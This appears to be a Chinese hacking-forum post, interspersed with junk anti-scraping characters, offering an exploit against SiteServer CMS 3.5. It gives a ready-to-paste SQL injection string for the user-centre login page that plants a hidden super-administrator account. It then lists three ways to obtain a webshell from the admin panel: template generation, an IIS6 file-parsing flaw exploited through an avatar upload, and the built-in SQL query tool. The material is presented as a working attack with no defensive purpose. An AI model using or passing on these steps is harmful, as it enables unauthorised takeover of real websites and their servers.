经测试秒杀最新的3.5版
* ]$ r* V+ M: N2 X _; j, k
& P+ a- `+ q9 ]' \! R$ j7 o9 ustieserver官网:www.siteserver.cn
# c) P' W6 s S8 ?1 `, c* s2 k% N. n; V0 Y5 G7 C" a: a
6 ~* j' |8 P9 s7 W, j- j8 q( L4 h9 a* I4 {; b. t# ?7 P% D4 j
EXP:
3 u0 X7 c9 N8 ~6 c. m
- C$ r; e& a% H/ }* r直接访问UserCenter/login.aspx$ X! D/ }$ M. K/ Z8 X; S9 B, g6 W
; }* N! m" `0 @& F
* e( H) I6 @. @! ?1 \0 _) G
" h0 H1 G! K# F6 A8 V- g0 e; `( x3 k用户名处输入:
8 M' @; ^+ ~4 R; o$ P& b( u" X6 f: Q9 ?, O# o
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--+ u9 z8 T& X( |' X9 l6 S4 b7 Z& k
: ^7 a) ~6 _" J# l4 S s/ E
6 ~* K, I, J% ?! _& Q
2 W. e* M" u& g. P0 g# n- [, ?密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
" v5 r2 e: l) w3 {2 [2 [
) X: l0 \: Q7 J1 Y5 f" `% M
! e* S" ?$ G g( \( y
" Y; n* Z2 ~$ n& X4 {4 s, Q" r之后再访问后台SiteServer/login.aspx用插入的用户登陆
( |2 V; x( T2 N T! b" g; {) F! n0 v# }5 a
" ?( a' M: C E* S/ Z& o" |$ }8 B
后台拿webshell的三种方法:$ L% a" w/ v3 ]9 b$ B/ N) @# ^
/ ?4 l# j# @1 _& N: ~一、& @' G o9 \. v) L2 o
& V! y* o+ M9 V( Z0 C
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx* u% q7 ?6 ^8 x* L
9 S/ a! _6 j: Z$ j1 g二、
7 X9 L' q* I) x! O4 Y: F& R- S# P2 C% k- P3 b, `1 Z, O
成员权限-》添加用户-》用户名为:1.asp# p0 O* I& u: s& C
6 |" C3 W- D- q! V: ~3 c. Nhttp://127.0.0.1/usercenter/
m& l+ n& }5 j \/ m1 y; ]. \. }& g8 m$ Q' J d& F' n
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
7 M7 V9 \) R9 g& {- `
& O! ` G& R X( _+ b' [4 X(ps:后台添加用户时不会验证是否含有非法字符) E, h: |3 J1 Q, K: X, `) j+ k
# D4 ?& e* B* q9 F0 i三、2 ]: W$ ~: i0 Y8 `0 n+ `
. |. e( [: r' `8 Z" n
系统工具-》实用工具-》机器参数查看
4 O5 l/ F8 @7 D4 G可以看到数据库类型、名称,WEB路径' ]! B; \& U# {% t9 F: r9 R Z
' F6 s; C% A: p- j/ F: d$ v系统工具-》数据库工具-》SQL语句查询
! u" _4 Y& `+ q% ~: K7 @& H. c这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。+ G. B0 a+ O" o6 Y2 ?9 C/ H
5 d. U) m" g' Q& u$ U+ {1 ]3 H |